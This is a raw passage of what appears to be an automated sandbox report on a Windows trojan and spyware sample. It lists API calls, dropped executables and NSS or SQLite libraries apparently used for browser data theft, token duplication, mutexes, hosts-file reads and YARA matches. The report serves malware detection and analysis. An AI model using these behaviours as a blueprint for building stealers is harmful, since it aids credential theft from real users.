Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270ACE8 ZwQuerySystemInformation,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,	0_2_7270ACE8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264DCFD RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlFreeHeap,	0_2_7264DCFD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642CFB RtlFreeHeap,ZwClose,ZwSetEvent,	0_2_72642CFB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264BCCD RtlDebugPrintTimes,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlInitUnicodeString,RtlDebugPrintTimes,RtlReleasePath,ZwTerminateProcess,	0_2_7264BCCD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267BCC9 LdrControlFlowGuardEnforced,ZwAllocateVirtualMemory,RtlCreateHeap,RtlAllocateHeap,RtlProtectHeap,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlProtectHeap,RtlFreeHeap,RtlDestroyHeap,ZwFreeVirtualMemory,	0_2_7267BCC9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72683CD8 RtlInitUnicodeString,RtlInitAnsiString,RtlAnsiStringToUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,ZwRaiseHardError,RtlRaiseStatus,RtlAllocateHeap,	0_2_72683CD8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BCD0 ZwShutdownWorkerFactory,	0_2_7268BCD0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72700C9A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72700C9A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D0C82 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,	0_2_726D0C82
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264FC90 RtlExitUserProcess,RtlEnterCriticalSection,RtlLockHeap,ZwTerminateProcess,RtlLeaveCriticalSection,RtlReportSilentProcessExit,LdrShutdownProcess,ZwTerminateProcess,RtlExitUserProcess,memset,RtlUnlockHeap,RtlLeaveCriticalSection,ZwTerminateThread,	0_2_7264FC90
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642C92 RtlFreeHeap,ZwSetEvent,ZwAlertThreadByThreadId,	0_2_72642C92
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701C8D ZwPowerInformation,ZwClose,	0_2_72701C8D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F5D69 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,	0_2_726F5D69
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C6D65 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException,	0_2_726C6D65
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D7D62 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,	0_2_726D7D62
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265CD70 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,	0_2_7265CD70
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72682D5C RtlFreeHeap,ZwProtectVirtualMemory,	0_2_72682D5C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D5D55 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy,	0_2_726D5D55
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BD20 ZwSubscribeWnfStateChange,	0_2_7268BD20
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642D2B RtlFreeHeap,ZwSetEvent,ZwClose,	0_2_72642D2B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72700D1B RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72700D1B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267FD13 ZwUnmapViewOfSection,	0_2_7267FD13
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266DD1E RtlGetCurrentServiceSessionId,ZwSetInformationThread,ZwSetInformationThread,	0_2_7266DD1E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72714D0E ZwDelayExecution,ZwFreeVirtualMemory,ZwClose,ZwClose,RtlDeleteCriticalSection,RtlFreeUnicodeString,RtlFreeUnicodeString,RtlFreeUnicodeString,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,	0_2_72714D0E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72644DE0 TpWaitForAlpcCompletion,TpWaitForAlpcCompletion,ZwAlpcQueryInformation,	0_2_72644DE0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267FDEC ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,RtlImageNtHeaderEx,ZwUnmapViewOfSection,ZwClose,ZwClose,	0_2_7267FDEC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72715DE0 EtwReplyNotification,ZwTraceControl,RtlNtStatusToDosError,	0_2_72715DE0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267BDF2 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction,	0_2_7267BDF2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266EDD4 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,	0_2_7266EDD4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268ADD0 ZwCreateTimer2,	0_2_7268ADD0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72687DD6 ZwQuerySystemInformation,EtwpCreateEtwThread,RtlNtStatusToDosError,RtlNtStatusToDosError,ZwClose,RtlNtStatusToDosError,	0_2_72687DD6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BDB0 ZwTraceControl,	0_2_7268BDB0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268ADB0 ZwCreateThreadEx,	0_2_7268ADB0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72647D80 RtlLockMemoryZone,RtlAcquireSRWLockExclusive,ZwLockVirtualMemory,RtlReleaseSRWLockExclusive,RtlLockMemoryZone,ZwUnlockVirtualMemory,ZwUnlockVirtualMemory,	0_2_72647D80
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653D90 RtlpGetSystemDefaultUILanguage,RtlpCreateProcessRegistryInfo,RtlpGetSystemDefaultUILanguage,ZwQueryInstallUILanguage,ZwIsUILanguageComitted,	0_2_72653D90
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72700D8A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72700D8A
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_001EEEB0 NtdllDefWindowProc_W,	5_2_001EEEB0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_001F06D0 NtdllDefWindowProc_W,	5_2_001F06D0

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267523D	0_2_7267523D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726642B0	0_2_726642B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726763C2	0_2_726763C2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726733B4	0_2_726733B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671070	0_2_72671070
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267E020	0_2_7267E020
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726540CC	0_2_726540CC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A080	0_2_7265A080
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72656090	0_2_72656090
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72669110	0_2_72669110
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72677110	0_2_72677110
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FE1FF	0_2_726FE1FF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727061DF	0_2_727061DF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265B1B0	0_2_7265B1B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72676180	0_2_72676180
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270C677	0_2_7270C677
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72667640	0_2_72667640
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649630	0_2_72649630
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72676611	0_2_72676611
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72711746	0_2_72711746
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726467D0	0_2_726467D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72702782	0_2_72702782
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270544C	0_2_7270544C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FF42B	0_2_726FF42B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265740C	0_2_7265740C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726EC53F	0_2_726EC53F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72661530	0_2_72661530
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726EE58A	0_2_726EE58A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72674A5B	0_2_72674A5B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72700A02	0_2_72700A02
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72664A10	0_2_72664A10
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72670A10	0_2_72670A10
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72705AF2	0_2_72705AF2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265FAA0	0_2_7265FAA0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266FB40	0_2_7266FB40
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72663BD0	0_2_72663BD0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72674B96	0_2_72674B96
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72679810	0_2_72679810
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727128E8	0_2_727128E8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726748CB	0_2_726748CB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726488B0	0_2_726488B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267594B	0_2_7267594B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72699906	0_2_72699906
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72674E61	0_2_72674E61
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72675E70	0_2_72675E70
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703E96	0_2_72703E96
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72677FED	0_2_72677FED
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264BFF6	0_2_7264BFF6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264DFAB	0_2_7264DFAB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72673C00	0_2_72673C00
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650CF5	0_2_72650CF5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270DCC5	0_2_7270DCC5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72712C9A	0_2_72712C9A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72640D40	0_2_72640D40
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F1DE3	0_2_726F1DE3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00415AB0	0_2_00415AB0
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: 3_2_00415AB0	3_2_00415AB0
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004361FB	4_2_004361FB
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0041A278	4_2_0041A278
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004365C3	4_2_004365C3
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0040A5D7	4_2_0040A5D7
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00412B65	4_2_00412B65
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00418F1C	4_2_00418F1C
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043D03F	4_2_0043D03F
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00435104	4_2_00435104
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004253C0	4_2_004253C0
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004233CC	4_2_004233CC
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004094E8	4_2_004094E8
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0040B586	4_2_0040B586
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004198F9	4_2_004198F9
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00409BD7	4_2_00409BD7
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0041BEAA	4_2_0041BEAA
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0045A03C	4_2_0045A03C
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004421CB	4_2_004421CB
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0040C1D1	4_2_0040C1D1
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004641BD	4_2_004641BD
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043C4ED	4_2_0043C4ED
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00442486	4_2_00442486
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00442890	4_2_00442890
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00416923	4_2_00416923
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0045CA70	4_2_0045CA70
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0044CD28	4_2_0044CD28
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0044CF5A	4_2_0044CF5A
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00412FF7	4_2_00412FF7
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0044D1BF	4_2_0044D1BF
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00417233	4_2_00417233
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004272C0	4_2_004272C0
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00431286	4_2_00431286
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00411514	4_2_00411514
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004136CE	4_2_004136CE
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004418E8	4_2_004418E8
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0045D989	4_2_0045D989
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00417A76	4_2_00417A76
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00441C5A	4_2_00441C5A
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00413E0D	4_2_00413E0D
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00417E0C	4_2_00417E0C
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00447F4A	4_2_00447F4A
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00441F04	4_2_00441F04
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00423F05	4_2_00423F05
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00449F10	4_2_00449F10
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00459F1C	4_2_00459F1C
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_00408920	5_2_00408920
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_0041C270	5_2_0041C270
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_00415290	5_2_00415290
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_001EC4C0	5_2_001EC4C0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_001E54E0	5_2_001E54E0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_001F7E64	5_2_001F7E64
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_0267C270	9_2_0267C270
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02675290	9_2_02675290
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02668920	9_2_02668920

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: String function: 7269DDE8 appears 70 times
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: String function: 7268C840 appears 33 times
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: String function: 726C4F10 appears 65 times
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: String function: 7264B0E0 appears 229 times
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: String function: 726D5110 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: String function: 0040EFA4 appears 109 times
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: String function: 0043FC60 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: String function: 004674B0 appears 172 times
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: String function: 0044EB89 appears 77 times

Source: y98WYYcJ2U.exe	Static PE information: Resource name: AFX_DIALOG_LAYOUT type: ump; 370 XA sysV pure executable
Source: cwfbibg.2.dr	Static PE information: Resource name: AFX_DIALOG_LAYOUT type: ump; 370 XA sysV pure executable
Source: 3BD3.exe.2.dr	Static PE information: Resource name: AFX_DIALOG_LAYOUT type: ump; 370 XA sysV pure executable
Source: tiik.exe.9.dr	Static PE information: Resource name: AFX_DIALOG_LAYOUT type: ump; 370 XA sysV pure executable

Source: sqlite3.dll.4.dr	Static PE information: Number of sections : 18 > 10
Source: sqlite3[1].dll.4.dr	Static PE information: Number of sections : 18 > 10

Source: 210A.tmp.3.dr	Static PE information: No import functions for PE file found
Source: 210A.tmp.0.dr	Static PE information: No import functions for PE file found

Source: y98WYYcJ2U.exe, 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs y98WYYcJ2U.exe

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll			Jump to behavior

Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll, type: DROPPED	Matched rule: ConventionEngine_Keyword_Inject sample_md5 = 081686496db01e44871f4e4a09e35fed, author = @stvemillertime, description = Searching for PE files with PDB path keywords, terms or anomalies., ref_blog = https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html
Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll, type: DROPPED	Matched rule: ConventionEngine_Keyword_Hook sample_md5 = 92156ddfa4c1ec330ffd24ccef127a7a, author = @stvemillertime, description = Searching for PE files with PDB path keywords, terms or anomalies., ref_blog = https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html
Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll, type: DROPPED	Matched rule: ConventionEngine_Keyword_Proxy sample_md5 = 7486404888b3223ef171a310426b2387, author = @stvemillertime, description = Searching for PE files with PDB path keywords, terms or anomalies., ref_blog = https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html
Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll, type: DROPPED	Matched rule: ConventionEngine_Keyword_Hook sample_md5 = 92156ddfa4c1ec330ffd24ccef127a7a, author = @stvemillertime, description = Searching for PE files with PDB path keywords, terms or anomalies., ref_blog = https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html
Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll, type: DROPPED	Matched rule: ConventionEngine_Keyword_Proxy sample_md5 = 7486404888b3223ef171a310426b2387, author = @stvemillertime, description = Searching for PE files with PDB path keywords, terms or anomalies., ref_blog = https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html

Source: y98WYYcJ2U.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: cwfbibg.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 3BD3.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tiik.exe.9.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 210A.tmp.0.dr

Binary string: \Device\IPT

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/79@31/3

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 9_2_0266FDC0 AdjustTokenPrivileges,FindCloseChangeNotification,

9_2_0266FDC0

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Code function: RtlCreateServiceSid,RtlUpcaseUnicodeString,A_SHAInit,A_SHAUpdate,A_SHAFinal,RtlFreeUnicodeString,RtlInitializeSid,RtlCreateServiceSid,

0_2_7264C700

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_00437C3A __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW,

4_2_00437C3A

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_004232F7 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

4_2_004232F7

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Code function: 0_2_004159E0 _hread,EnumDateFormatsA,_llseek,RtlEnterCriticalSection,VirtualLock,LoadResource,

0_2_004159E0

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\cwfbibg

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\{54025FCC-BC55-43F1-1000-D05E7EC873D3}
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Mutant created: \Sessions\1\BaseNamedObjects\dfthorbnjuser
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\{747A6FCC-8C55-6389-1000-D05E7EC873D3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2392:120:WilError_01
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\{E4EB5D50-BEC9-F318-1000-D05E7EC873D3}

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

File created: C:\Users\user\AppData\Local\Temp\210A.tmp

Jump to behavior

Source: y98WYYcJ2U.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: softokn3.dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
